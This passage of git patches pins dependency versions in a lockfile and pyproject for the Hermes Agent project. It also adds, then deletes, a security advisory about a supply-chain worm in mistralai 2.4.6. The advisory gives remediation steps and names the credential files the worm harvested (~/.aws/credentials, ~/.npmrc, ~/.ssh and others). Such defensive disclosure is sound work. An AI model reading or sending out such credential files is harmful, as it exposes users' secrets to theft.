-    { url = "https://files.pythonhosted.org/packages/cf/22/fdc2e30d43ff853720042fa15baa3e6122722be1a7950a98233ebb55cd71/eval_type_backport-0.3.1-py3-none-any.whl", hash = "sha256:279ab641905e9f11129f56a8a78f493518515b83402b860f6f06dd7c011fdfa8", size = 6063, upload-time = "2025-12-02T11:51:41.665Z" },
-]
-
 [[package]]
 name = "exa-py"
 version = "2.10.2"
@@ -1962,17 +1953,11 @@ name = "hermes-agent"
 version = "0.13.0"
 source = { editable = "." }
 dependencies = [
-    { name = "anthropic" },
     { name = "croniter" },
-    { name = "edge-tts" },
-    { name = "exa-py" },
-    { name = "fal-client" },
     { name = "fire" },
-    { name = "firecrawl-py" },
     { name = "httpx", extra = ["socks"] },
     { name = "jinja2" },
     { name = "openai" },
-    { name = "parallel-web" },
     { name = "prompt-toolkit" },
     { name = "psutil" },
     { name = "pydantic" },
@@ -1996,15 +1981,20 @@ all = [
     { name = "aiohttp-socks", marker = "sys_platform == 'linux'" },
     { name = "aiosqlite", marker = "sys_platform == 'linux'" },
     { name = "alibabacloud-dingtalk" },
+    { name = "anthropic" },
     { name = "asyncpg", marker = "sys_platform == 'linux'" },
     { name = "boto3" },
     { name = "daytona" },
     { name = "debugpy" },
     { name = "dingtalk-stream" },
     { name = "discord-py", extra = ["voice"] },
+    { name = "edge-tts" },
     { name = "elevenlabs" },
+    { name = "exa-py" },
+    { name = "fal-client" },
     { name = "fastapi" },
     { name = "faster-whisper" },
+    { name = "firecrawl-py" },
     { name = "google-api-python-client" },
     { name = "google-auth-httplib2" },
     { name = "google-auth-oauthlib" },
@@ -2013,9 +2003,9 @@ all = [
     { name = "markdown", marker = "sys_platform == 'linux'" },
     { name = "mautrix", extra = ["encryption"], marker = "sys_platform == 'linux'" },
     { name = "mcp" },
-    { name = "mistralai" },
     { name = "modal" },
     { name = "numpy" },
+    { name = "parallel-web" },
     { name = "ptyprocess", marker = "sys_platform != 'win32'" },
     { name = "pytest" },
     { name = "pytest-asyncio" },
@@ -2034,6 +2024,9 @@ all = [
     { name = "vercel" },
     { name = "youtube-transcript-api" },
 ]
+anthropic = [
+    { name = "anthropic" },
+]
 bedrock = [
     { name = "boto3" },
 ]
@@ -2061,10 +2054,22 @@ dingtalk = [
     { name = "dingtalk-stream" },
     { name = "qrcode" },
 ]
+edge-tts = [
+    { name = "edge-tts" },
+]
+exa = [
+    { name = "exa-py" },
+]
+fal = [
+    { name = "fal-client" },
+]
 feishu = [
     { name = "lark-oapi" },
     { name = "qrcode" },
 ]
+firecrawl = [
+    { name = "firecrawl-py" },
+]
 google = [
     { name = "google-api-python-client" },
     { name = "google-auth-httplib2" },
@@ -2097,12 +2102,12 @@ messaging = [
     { name = "slack-bolt" },
     { name = "slack-sdk" },
 ]
-mistral = [
-    { name = "mistralai" },
-]
 modal = [
     { name = "modal" },
 ]
+parallel-web = [
+    { name = "parallel-web" },
+]
 pty = [
     { name = "ptyprocess", marker = "sys_platform != 'win32'" },
     { name = "pywinpty", marker = "sys_platform == 'win32'" },
@@ -2145,7 +2150,6 @@ termux-all = [
     { name = "honcho-ai" },
     { name = "lark-oapi" },
     { name = "mcp" },
-    { name = "mistralai" },
     { name = "ptyprocess", marker = "sys_platform != 'win32'" },
     { name = "python-telegram-bot", extra = ["webhooks"] },
     { name = "pywinpty", marker = "sys_platform == 'win32'" },
@@ -2179,36 +2183,37 @@ youtube = [
 
 [package.metadata]
 requires-dist = [
-    { name = "agent-client-protocol", marker = "extra == 'acp'", specifier = ">=0.9.0,<1.0" },
-    { name = "aiohttp", marker = "extra == 'homeassistant'", specifier = ">=3.9.0,<4" },
-    { name = "aiohttp", marker = "extra == 'messaging'", specifier = ">=3.13.3,<4" },
-    { name = "aiohttp", marker = "extra == 'sms'", specifier = ">=3.9.0,<4" },
-    { name = "aiohttp-socks", marker = "extra == 'matrix'", specifier = ">=0.10,<1" },
-    { name = "aiosqlite", marker = "extra == 'matrix'", specifier = ">=0.20" },
-    { name = "alibabacloud-dingtalk", marker = "extra == 'dingtalk'", specifier = ">=2.0.0" },
-    { name = "anthropic", specifier = ">=0.39.0,<1" },
-    { name = "asyncpg", marker = "extra == 'matrix'", specifier = ">=0.29" },
+    { name = "agent-client-protocol", marker = "extra == 'acp'", specifier = "==0.9.0" },
+    { name = "aiohttp", marker = "extra == 'homeassistant'", specifier = "==3.13.3" },
+    { name = "aiohttp", marker = "extra == 'messaging'", specifier = "==3.13.3" },
+    { name = "aiohttp", marker = "extra == 'sms'", specifier = "==3.13.3" },
+    { name = "aiohttp-socks", marker = "extra == 'matrix'", specifier = "==0.11.0" },
+    { name = "aiosqlite", marker = "extra == 'matrix'", specifier = "==0.22.1" },
+    { name = "alibabacloud-dingtalk", marker = "extra == 'dingtalk'", specifier = "==2.2.42" },
+    { name = "anthropic", marker = "extra == 'anthropic'", specifier = "==0.86.0" },
+    { name = "asyncpg", marker = "extra == 'matrix'", specifier = "==0.31.0" },
     { name = "atroposlib", marker = "extra == 'rl'", git = "https://github.com/NousResearch/atropos.git?rev=c20c85256e5a45ad31edf8b7276e9c5ee1995a30" },
-    { name = "boto3", marker = "extra == 'bedrock'", specifier = ">=1.35.0,<2" },
-    { name = "croniter", specifier = ">=6.0.0,<7" },
-    { name = "daytona", marker = "extra == 'daytona'", specifier = ">=0.148.0,<1" },
-    { name = "debugpy", marker = "extra == 'dev'", specifier = ">=1.8.0,<2" },
-    { name = "dingtalk-stream", marker = "extra == 'dingtalk'", specifier = ">=0.20,<1" },
-    { name = "discord-py", extras = ["voice"], marker = "extra == 'messaging'", specifier = ">=2.7.1,<3" },
-    { name = "edge-tts", specifier = ">=7.2.7,<8" },
-    { name = "elevenlabs", marker = "extra == 'tts-premium'", specifier = ">=1.0,<2" },
-    { name = "exa-py", specifier = ">=2.9.0,<3" },
-    { name = "fal-client", specifier = ">=0.13.1,<1" },
-    { name = "fastapi", marker = "extra == 'rl'", specifier = ">=0.104.0,<1" },
-    { name = "fastapi", marker = "extra == 'web'", specifier = ">=0.104.0,<1" },
-    { name = "faster-whisper", marker = "extra == 'voice'", specifier = ">=1.0.0,<2" },
-    { name = "fire", specifier = ">=0.7.1,<1" },
-    { name = "firecrawl-py", specifier = ">=4.16.0,<5" },
-    { name = "google-api-python-client", marker = "extra == 'google'", specifier = ">=2.100,<3" },
-    { name = "google-auth-httplib2", marker = "extra == 'google'", specifier = ">=0.2,<1" },
-    { name = "google-auth-oauthlib", marker = "extra == 'google'", specifier = ">=1.0,<2" },
+    { name = "boto3", marker = "extra == 'bedrock'", specifier = "==1.42.89" },
+    { name = "croniter", specifier = "==6.0.0" },
+    { name = "daytona", marker = "extra == 'daytona'", specifier = "==0.155.0" },
+    { name = "debugpy", marker = "extra == 'dev'", specifier = "==1.8.20" },
+    { name = "dingtalk-stream", marker = "extra == 'dingtalk'", specifier = "==0.24.3" },
+    { name = "discord-py", extras = ["voice"], marker = "extra == 'messaging'", specifier = "==2.7.1" },
+    { name = "edge-tts", marker = "extra == 'edge-tts'", specifier = "==7.2.7" },
+    { name = "elevenlabs", marker = "extra == 'tts-premium'", specifier = "==1.59.0" },
+    { name = "exa-py", marker = "extra == 'exa'", specifier = "==2.10.2" },
+    { name = "fal-client", marker = "extra == 'fal'", specifier = "==0.13.1" },
+    { name = "fastapi", marker = "extra == 'rl'", specifier = "==0.133.1" },
+    { name = "fastapi", marker = "extra == 'web'", specifier = "==0.133.1" },
+    { name = "faster-whisper", marker = "extra == 'voice'", specifier = "==1.2.1" },
+    { name = "fire", specifier = "==0.7.1" },
+    { name = "firecrawl-py", marker = "extra == 'firecrawl'", specifier = "==4.17.0" },
+    { name = "google-api-python-client", marker = "extra == 'google'", specifier = "==2.194.0" },
+    { name = "google-auth-httplib2", marker = "extra == 'google'", specifier = "==0.3.1" },
+    { name = "google-auth-oauthlib", marker = "extra == 'google'", specifier = "==1.3.1" },
     { name = "hermes-agent", extras = ["acp"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["acp"], marker = "extra == 'termux'" },
+    { name = "hermes-agent", extras = ["anthropic"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["bedrock"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["bedrock"], marker = "extra == 'termux-all'" },
     { name = "hermes-agent", extras = ["cli"], marker = "extra == 'all'" },
@@ -2219,8 +2224,12 @@ requires-dist = [
     { name = "hermes-agent", extras = ["dev"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["dingtalk"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["dingtalk"], marker = "extra == 'termux-all'" },
+    { name = "hermes-agent", extras = ["edge-tts"], marker = "extra == 'all'" },
+    { name = "hermes-agent", extras = ["exa"], marker = "extra == 'all'" },
+    { name = "hermes-agent", extras = ["fal"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["feishu"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["feishu"], marker = "extra == 'termux-all'" },
+    { name = "hermes-agent", extras = ["firecrawl"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["google"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["google"], marker = "extra == 'termux-all'" },
     { name = "hermes-agent", extras = ["homeassistant"], marker = "extra == 'all'" },
@@ -2232,9 +2241,8 @@ requires-dist = [
     { name = "hermes-agent", extras = ["mcp"], marker = "extra == 'termux'" },
     { name = "hermes-agent", extras = ["messaging"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["messaging"], marker = "extra == 'termux-all'" },
-    { name = "hermes-agent", extras = ["mistral"], marker = "extra == 'all'" },
-    { name = "hermes-agent", extras = ["mistral"], marker = "extra == 'termux-all'" },
     { name = "hermes-agent", extras = ["modal"], marker = "extra == 'all'" },
+    { name = "hermes-agent", extras = ["parallel-web"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["pty"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["pty"], marker = "extra == 'termux'" },
     { name = "hermes-agent", extras = ["slack"], marker = "extra == 'all'" },
@@ -2249,60 +2257,59 @@ requires-dist = [
     { name = "hermes-agent", extras = ["web"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["web"], marker = "extra == 'termux-all'" },
     { name = "hermes-agent", extras = ["youtube"], marker = "extra == 'all'" },
-    { name = "hindsight-client", marker = "extra == 'hindsight'", specifier = ">=0.4.22" },
-    { name = "honcho-ai", marker = "extra == 'honcho'", specifier = ">=2.0.1,<3" },
-    { name = "httpx", extras = ["socks"], specifier = ">=0.28.1,<1" },
-    { name = "jinja2", specifier = ">=3.1.5,<4" },
-    { name = "lark-oapi", marker = "extra == 'feishu'", specifier = ">=1.5.3,<2" },
-    { name = "markdown", marker = "extra == 'matrix'", specifier = ">=3.6,<4" },
-    { name = "mautrix", extras = ["encryption"], marker = "extra == 'matrix'", specifier = ">=0.20,<1" },
-    { name = "mcp", marker = "extra == 'computer-use'", specifier = ">=1.2.0,<2" },
-    { name = "mcp", marker = "extra == 'dev'", specifier = ">=1.2.0,<2" },
-    { name = "mcp", marker = "extra == 'mcp'", specifier = ">=1.2.0,<2" },
-    { name = "mistralai", marker = "extra == 'mistral'", specifier = ">=2.3.0,<3" },
-    { name = "modal", marker = "extra == 'modal'", specifier = ">=1.0.0,<2" },
-    { name = "numpy", marker = "extra == 'voice'", specifier = ">=1.24.0,<3" },
-    { name = "openai", specifier = ">=2.21.0,<3" },
-    { name = "parallel-web", specifier = ">=0.4.2,<1" },
-    { name = "prompt-toolkit", specifier = ">=3.0.52,<4" },
-    { name = "psutil", specifier = ">=5.9.0,<8" },
-    { name = "ptyprocess", marker = "sys_platform != 'win32' and extra == 'pty'", specifier = ">=0.7.0,<1" },
-    { name = "pydantic", specifier = ">=2.12.5,<3" },
-    { name = "pyjwt", extras = ["crypto"], specifier = ">=2.12.0,<3" },
-    { name = "pytest", marker = "extra == 'dev'", specifier = ">=9.0.2,<10" },
-    { name = "pytest-asyncio", marker = "extra == 'dev'", specifier = ">=1.3.0,<2" },
-    { name = "pytest-split", marker = "extra == 'dev'", specifier = ">=0.9,<1" },
-    { name = "pytest-xdist", marker = "extra == 'dev'", specifier = ">=3.0,<4" },
-    { name = "python-dotenv", specifier = ">=1.2.1,<2" },
-    { name = "python-telegram-bot", extras = ["webhooks"], marker = "extra == 'messaging'", specifier = ">=22.6,<23" },
-    { name = "python-telegram-bot", extras = ["webhooks"], marker = "extra == 'termux'", specifier = ">=22.6,<23" },
-    { name = "pywinpty", marker = "sys_platform == 'win32' and extra == 'pty'", specifier = ">=2.0.0,<3" },
-    { name = "pyyaml", specifier = ">=6.0.2,<7" },
-    { name = "qrcode", marker = "extra == 'dingtalk'", specifier = ">=7.0,<8" },
-    { name = "qrcode", marker = "extra == 'feishu'", specifier = ">=7.0,<8" },
-    { name = "qrcode", marker = "extra == 'messaging'", specifier = ">=7.0,<8" },
-    { name = "requests", specifier = ">=2.33.0,<3" },
-    { name = "rich", specifier = ">=14.3.3,<15" },
-    { name = "ruamel-yaml", specifier = ">=0.18.16,<0.19" },
-    { name = "ruff", marker = "extra == 'dev'" },
-    { name = "simple-term-menu", marker = "extra == 'cli'", specifier = ">=1.0,<2" },
-    { name = "slack-bolt", marker = "extra == 'messaging'", specifier = ">=1.18.0,<2" },
-    { name = "slack-bolt", marker = "extra == 'slack'", specifier = ">=1.18.0,<2" },
-    { name = "slack-sdk", marker = "extra == 'messaging'", specifier = ">=3.27.0,<4" },
-    { name = "slack-sdk", marker = "extra == 'slack'", specifier = ">=3.27.0,<4" },
-    { name = "sounddevice", marker = "extra == 'voice'", specifier = ">=0.4.6,<1" },
-    { name = "tenacity", specifier = ">=9.1.4,<10" },
+    { name = "hindsight-client", marker = "extra == 'hindsight'", specifier = "==0.6.1" },
+    { name = "honcho-ai", marker = "extra == 'honcho'", specifier = "==2.0.1" },
+    { name = "httpx", extras = ["socks"], specifier = "==0.28.1" },
+    { name = "jinja2", specifier = "==3.1.6" },
+    { name = "lark-oapi", marker = "extra == 'feishu'", specifier = "==1.5.3" },
+    { name = "markdown", marker = "extra == 'matrix'", specifier = "==3.10.2" },
+    { name = "mautrix", extras = ["encryption"], marker = "extra == 'matrix'", specifier = "==0.21.0" },
+    { name = "mcp", marker = "extra == 'computer-use'", specifier = "==1.26.0" },
+    { name = "mcp", marker = "extra == 'dev'", specifier = "==1.26.0" },
+    { name = "mcp", marker = "extra == 'mcp'", specifier = "==1.26.0" },
+    { name = "modal", marker = "extra == 'modal'", specifier = "==1.3.4" },
+    { name = "numpy", marker = "extra == 'voice'", specifier = "==2.4.3" },
+    { name = "openai", specifier = "==2.24.0" },
+    { name = "parallel-web", marker = "extra == 'parallel-web'", specifier = "==0.4.2" },
+    { name = "prompt-toolkit", specifier = "==3.0.52" },
+    { name = "psutil", specifier = "==7.2.2" },
+    { name = "ptyprocess", marker = "sys_platform != 'win32' and extra == 'pty'", specifier = "==0.7.0" },
+    { name = "pydantic", specifier = "==2.12.5" },
+    { name = "pyjwt", extras = ["crypto"], specifier = "==2.12.1" },
+    { name = "pytest", marker = "extra == 'dev'", specifier = "==9.0.2" },
+    { name = "pytest-asyncio", marker = "extra == 'dev'", specifier = "==1.3.0" },
+    { name = "pytest-split", marker = "extra == 'dev'", specifier = "==0.11.0" },
+    { name = "pytest-xdist", marker = "extra == 'dev'", specifier = "==3.8.0" },
+    { name = "python-dotenv", specifier = "==1.2.1" },
+    { name = "python-telegram-bot", extras = ["webhooks"], marker = "extra == 'messaging'", specifier = "==22.6" },
+    { name = "python-telegram-bot", extras = ["webhooks"], marker = "extra == 'termux'", specifier = "==22.6" },
+    { name = "pywinpty", marker = "sys_platform == 'win32' and extra == 'pty'", specifier = "==2.0.15" },
+    { name = "pyyaml", specifier = "==6.0.3" },
+    { name = "qrcode", marker = "extra == 'dingtalk'", specifier = "==7.4.2" },
+    { name = "qrcode", marker = "extra == 'feishu'", specifier = "==7.4.2" },
+    { name = "qrcode", marker = "extra == 'messaging'", specifier = "==7.4.2" },
+    { name = "requests", specifier = "==2.33.0" },
+    { name = "rich", specifier = "==14.3.3" },
+    { name = "ruamel-yaml", specifier = "==0.18.17" },
+    { name = "ruff", marker = "extra == 'dev'", specifier = "==0.15.10" },
+    { name = "simple-term-menu", marker = "extra == 'cli'", specifier = "==1.6.6" },
+    { name = "slack-bolt", marker = "extra == 'messaging'", specifier = "==1.27.0" },
+    { name = "slack-bolt", marker = "extra == 'slack'", specifier = "==1.27.0" },
+    { name = "slack-sdk", marker = "extra == 'messaging'", specifier = "==3.40.1" },
+    { name = "slack-sdk", marker = "extra == 'slack'", specifier = "==3.40.1" },
+    { name = "sounddevice", marker = "extra == 'voice'", specifier = "==0.5.5" },
+    { name = "tenacity", specifier = "==9.1.4" },
     { name = "tinker", marker = "extra == 'rl'", git = "https://github.com/thinking-machines-lab/tinker.git?rev=30517b667f18a3dfb7ef33fb56cf686d5820ba2b" },
-    { name = "ty", marker = "extra == 'dev'", specifier = ">=0.0.1a29,<0.0.22" },
-    { name = "tzdata", marker = "sys_platform == 'win32'", specifier = ">=2023.3" },
-    { name = "uvicorn", extras = ["standard"], marker = "extra == 'rl'", specifier = ">=0.24.0,<1" },
-    { name = "uvicorn", extras = ["standard"], marker = "extra == 'web'", specifier = ">=0.24.0,<1" },
-    { name = "vercel", marker = "extra == 'vercel'", specifier = ">=0.5.7,<0.6.0" },
-    { name = "wandb", marker = "extra == 'rl'", specifier = ">=0.15.0,<1" },
+    { name = "ty", marker = "extra == 'dev'", specifier = "==0.0.21" },
+    { name = "tzdata", marker = "sys_platform == 'win32'", specifier = "==2025.3" },
+    { name = "uvicorn", extras = ["standard"], marker = "extra == 'rl'", specifier = "==0.41.0" },
+    { name = "uvicorn", extras = ["standard"], marker = "extra == 'web'", specifier = "==0.41.0" },
+    { name = "vercel", marker = "extra == 'vercel'", specifier = "==0.5.7" },
+    { name = "wandb", marker = "extra == 'rl'", specifier = "==0.25.1" },
     { name = "yc-bench", marker = "python_full_version >= '3.12' and extra == 'yc-bench'", git = "https://github.com/collinear-ai/yc-bench.git?rev=bfb0c88062450f46341bd9a5298903fc2e952a5c" },
-    { name = "youtube-transcript-api", marker = "extra == 'youtube'", specifier = ">=1.2.0" },
+    { name = "youtube-transcript-api", marker = "extra == 'youtube'", specifier = "==1.2.4" },
 ]
-provides-extras = ["modal", "daytona", "vercel", "hindsight", "dev", "messaging", "cron", "slack", "matrix", "cli", "tts-premium", "voice", "pty", "honcho", "mcp", "homeassistant", "sms", "computer-use", "acp", "mistral", "bedrock", "termux", "termux-all", "dingtalk", "feishu", "google", "youtube", "web", "rl", "yc-bench", "all"]
+provides-extras = ["anthropic", "exa", "firecrawl", "parallel-web", "fal", "edge-tts", "modal", "daytona", "vercel", "hindsight", "dev", "messaging", "cron", "slack", "matrix", "cli", "tts-premium", "voice", "pty", "honcho", "mcp", "homeassistant", "sms", "computer-use", "acp", "bedrock", "termux", "termux-all", "dingtalk", "feishu", "google", "youtube", "web", "rl", "yc-bench", "all"]
 
 [[package]]
 name = "hf-transfer"
@@ -2688,15 +2695,6 @@ wheels = [
     { url = "https://files.pythonhosted.org/packages/f8/62/d9ba6323b9202dd2fe166beab8a86d29465c41a0288cbe229fac60c1ab8d/jsonlines-4.0.0-py3-none-any.whl", hash = "sha256:185b334ff2ca5a91362993f42e83588a360cf95ce4b71a73548502bda52a7c55", size = 8701, upload-time = "2023-09-01T12:34:42.563Z" },
 ]
 
-[[package]]
-name = "jsonpath-python"
-version = "1.1.5"
-source = { registry = "https://pypi.org/simple" }
-sdist = { url = "https://files.pythonhosted.org/packages/2d/db/2f4ecc24da35c6142b39c353d5b7c16eef955cc94b35a48d3fa47996d7c3/jsonpath_python-1.1.5.tar.gz", hash = "sha256:ceea2efd9e56add09330a2c9631ea3d55297b9619348c1055e5bfb9cb0b8c538", size = 87352, upload-time = "2026-03-17T06:16:40.597Z" }
-wheels = [
-    { url = "https://files.pythonhosted.org/packages/28/50/1a313fb700526b134c71eb8a225d8b83be0385dbb0204337b4379c698cef/jsonpath_python-1.1.5-py3-none-any.whl", hash = "sha256:a60315404d70a65e76c9a782c84e50600480221d94a58af47b7b4d437351cb4b", size = 14090, upload-time = "2026-03-17T06:16:39.152Z" },
-]
-
 [[package]]
 name = "jsonschema"
 version = "4.26.0"
@@ -3117,25 +3115,6 @@ wheels = [
     { url = "https://files.pythonhosted.org/packages/b3/38/89ba8ad64ae25be8de66a6d463314cf1eb366222074cfda9ee839c56a4b4/mdurl-0.1.2-py3-none-any.whl", hash = "sha256:84008a41e51615a49fc9966191ff91509e3c40b939176e643fd50a5c2196b8f8", size = 9979, upload-time = "2022-08-14T12:40:09.779Z" },
 ]
 
-[[package]]
-name = "mistralai"
-version = "2.3.0"
-source = { registry = "https://pypi.org/simple" }
-dependencies = [
-    { name = "eval-type-backport" },
-    { name = "httpx" },
-    { name = "jsonpath-python" },
-    { name = "opentelemetry-api" },
-    { name = "opentelemetry-semantic-conventions" },
-    { name = "pydantic" },
-    { name = "python-dateutil" },
-    { name = "typing-inspection" },
-]
-sdist = { url = "https://files.pythonhosted.org/packages/4d/05/40c38c8893f0ec858756b30f4a939378fc62cf33565af538a843497f3f24/mistralai-2.3.0.tar.gz", hash = "sha256:eb371a9b3b62552f3d4a274ecf5b2c48b90fd3439ecd1425e7f5163cdd87e29a", size = 387145, upload-time = "2026-04-03T15:06:48.927Z" }
-wheels = [
-    { url = "https://files.pythonhosted.org/packages/bd/57/d06cbfd96ec6dc45d5c1fe9456f7fcfcb9549c9fa91e213561d1d88729e7/mistralai-2.3.0-py3-none-any.whl", hash = "sha256:22111747c215f1632141660151924f06579f87cd8db2649e0b1f87721d076851", size = 925544, upload-time = "2026-04-03T15:06:47.593Z" },
-]
-
 [[package]]
 name = "modal"
 version = "1.3.4"
diff --git a/website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md b/website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md
new file mode 100644
index 00000000000..1cb2ec79e4c
--- /dev/null
+++ b/website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md
@@ -0,0 +1,138 @@
+# Hermes Agent — Security Advisory: Mini Shai-Hulud worm (mistralai 2.4.6)
+
+**Date:** May 12, 2026
+**Status:** Quarantined upstream / mitigated in Hermes
+**Severity:** Critical
+**Affected:** Users who installed `hermes-agent[all]` or `hermes-agent[mistral]` between the upload of `mistralai 2.4.6` and PyPI's quarantine of the package.
+
+## What happened
+
+The Mini Shai-Hulud supply-chain worm crossed from npm to PyPI on 2026-05-12.
+Among the compromised PyPI artifacts was `mistralai 2.4.6` — the official
+Mistral AI Python SDK. The worm steals credentials from environment
+variables and credential files (`~/.npmrc`, `~/.pypirc`, `~/.aws/credentials`,
+GitHub PATs, cloud SDK tokens) and exfils them to a hardcoded webhook.
+
+Hermes Agent listed `mistralai>=2.3.0,<3` as the runtime dependency for its
+optional Mistral TTS / STT providers. Users who installed
+`pip install -e ".[all]"` between the malicious upload and the quarantine
+pulled `mistralai 2.4.6` into their venv. PyPI has since removed the project
+(`pypi:project-status: quarantined`), so the package is no longer
+installable, but copies that landed before quarantine remain in users'
+environments.
+
+## Am I affected?
+
+Run on the host where you installed Hermes:
+
+```bash
+hermes doctor
+```
+
+If the **Security Advisories** section flags
+`mistralai==2.4.6`, you have the compromised package and must remediate.
+If it flags any **other** version of `mistralai`, you are not on the
+compromised release — but we still recommend uninstalling, since the
+project is currently quarantined and we have disabled Mistral TTS / STT
+in Hermes regardless.
+
+You can also check manually:
+
+```bash
+pip show mistralai 2>/dev/null | grep -i version
+```
+
+## What we've done in Hermes Agent
+
+1. **Removed `mistral` from the `[all]` extra** so fresh installs no
+   longer pull the package by default. (PR #24205, already on main.)
+2. **Disabled the Mistral TTS and STT providers** in the runtime — they
+   return a "temporarily disabled" error and won't import the SDK even
+   if the venv still has it.
+3. **Added a security advisory checker** (`hermes doctor` and CLI startup
+   banner) that detects `mistralai 2.4.6` if it's still installed and
+   surfaces remediation steps. The banner is rate-limited (max once per
+   24h per advisory) and dismissible via `hermes doctor --ack`.
+4. **Hardened the installer fallback tiers.** When one extra's
+   dependency becomes unavailable on PyPI, the installer now degrades
+   gracefully — keeping every other extra — instead of dropping all the
+   way to a stripped install. Future supply-chain incidents won't
+   silently demote users.
+5. **Added a lazy-install framework** (`tools/lazy_deps.py`) so opt-in
+   backends (Mistral, ElevenLabs, Honcho, etc.) can be installed on
+   demand when the user enables them, rather than eagerly at install
+   time. This shrinks every fresh install's blast radius for future
+   single-package compromises.
+
+## What you should do
+
+If `hermes doctor` flags `mistralai==2.4.6`, treat the credentials in
+your environment as exposed:
+
+1. **Uninstall the compromised package:**
+   ```bash
+   pip uninstall -y mistralai
+   # or, if you installed via uv:
+   uv pip uninstall mistralai
+   ```
+
+2. **Rotate API keys.** Every key in `~/.hermes/.env` should be rotated:
+   OpenRouter, Anthropic, OpenAI, Nous, GitHub, AWS, Google, Mistral,
+   and any other provider tokens you have configured. If you used a
+   shell that exported keys (`.bashrc`, `.zshrc`, etc.), rotate those
+   too.
+
+3. **Audit credential files** for tokens that may have been read:
+   `~/.npmrc`, `~/.pypirc`, `~/.aws/credentials`, `~/.config/gh/hosts.yml`,
+   `~/.docker/config.json`, `~/.kube/config`, `~/.ssh/`. The worm
+   harvested files matching these patterns.
+
+4. **Check GitHub** for unexpected new SSH keys, deploy keys, or webhook
+   additions on repositories you have admin on. The worm uses stolen
+   GitHub tokens to add backdoors.
+
+5. **After cleanup**, dismiss the Hermes warning:
+   ```bash
+   hermes doctor --ack shai-hulud-2026-05
+   ```
+
+## When will Mistral TTS / STT come back?
+
+When PyPI restores the `mistralai` project to a clean release and we
+verify the new release on a clean network, we will re-enable Mistral
+TTS / STT in Hermes Agent. Until then, use Edge TTS (default, no key),
+ElevenLabs, OpenAI TTS, MiniMax TTS, or any of the user-defined command
+providers. For STT, use Groq Whisper or OpenAI Whisper.
+
+## Future hardening
+
+This incident exposed two structural weaknesses in our install path:
+
+- Eager-install of every optional extra meant ONE compromised package
+  could break the whole `[all]` resolve. **Fixed** via tiered fallback +
+  lazy-install framework.
+- Users had no way to know whether they had a poisoned dependency.
+  **Fixed** via `hermes_cli/security_advisories.py` and the
+  `hermes doctor` integration.
+
+We will continue to extend `tools/lazy_deps.py` so additional opt-in
+backends (Slack, Matrix, Bedrock, DingTalk, Feishu, Google Workspace,
+YouTube transcripts, etc.) can be installed on first use rather than
+eagerly. This reduces the blast radius of any future single-package
+compromise.
+
+## References
+
+- Socket Security report: <https://socket.dev/blog/mini-shai-hulud-worm-pypi>
+- PyPI quarantine: <https://pypi.org/simple/mistralai/>
+  (project-status: quarantined as of 2026-05-12)
+- Hermes Agent PR (mistral disabled): #24205
+- Hermes Agent PR (advisory checker + lazy installs): _this PR_
+- GitHub security advisory: _to be filed alongside this PR_
+
+## Credits
+
+Reported via [@SocketSecurity](https://twitter.com/SocketSecurity) and
+the broader supply-chain security community. Hermes Agent's response
+(detection, lazy-install framework, installer tier hardening) was built
+by the Hermes Agent team at Nous Research.

From dd0923bb89ed2dd56f82cb63656a1323f6f42e6f Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 01:09:58 -0700
Subject: [PATCH 10/59] docs: remove public advisory page (handle community
 comms separately) (#24253)

---
 pyproject.toml                                |   1 -
 .../shai-hulud-mistralai-2026-05.md           | 138 ------------------
 2 files changed, 139 deletions(-)
 delete mode 100644 website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md

diff --git a/pyproject.toml b/pyproject.toml
index b01a2466d64..68b2a38471b 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -20,7 +20,6 @@ dependencies = [
   # worm hitting mistralai 2.4.6 on PyPI; if that release had been
   # captured by `mistralai>=2.3.0,<3` rather than an exact pin, every
   # install in the hours before the quarantine would have pulled it.
-  # See website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md.
   #
   # When updating: bump the version below AND regenerate uv.lock with
   # `uv lock` so the transitive resolution stays consistent. Don't
diff --git a/website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md b/website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md
deleted file mode 100644
index 1cb2ec79e4c..00000000000
--- a/website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md
+++ /dev/null
@@ -1,138 +0,0 @@
-# Hermes Agent — Security Advisory: Mini Shai-Hulud worm (mistralai 2.4.6)
-
-**Date:** May 12, 2026
-**Status:** Quarantined upstream / mitigated in Hermes
-**Severity:** Critical
-**Affected:** Users who installed `hermes-agent[all]` or `hermes-agent[mistral]` between the upload of `mistralai 2.4.6` and PyPI's quarantine of the package.
-
-## What happened
-
-The Mini Shai-Hulud supply-chain worm crossed from npm to PyPI on 2026-05-12.
-Among the compromised PyPI artifacts was `mistralai 2.4.6` — the official
-Mistral AI Python SDK. The worm steals credentials from environment
-variables and credential files (`~/.npmrc`, `~/.pypirc`, `~/.aws/credentials`,
-GitHub PATs, cloud SDK tokens) and exfils them to a hardcoded webhook.
-
-Hermes Agent listed `mistralai>=2.3.0,<3` as the runtime dependency for its
-optional Mistral TTS / STT providers. Users who installed
-`pip install -e ".[all]"` between the malicious upload and the quarantine
-pulled `mistralai 2.4.6` into their venv. PyPI has since removed the project
-(`pypi:project-status: quarantined`), so the package is no longer
-installable, but copies that landed before quarantine remain in users'
-environments.
-
-## Am I affected?
-
-Run on the host where you installed Hermes:
-
-```bash
-hermes doctor
-```
-
-If the **Security Advisories** section flags
-`mistralai==2.4.6`, you have the compromised package and must remediate.
-If it flags any **other** version of `mistralai`, you are not on the
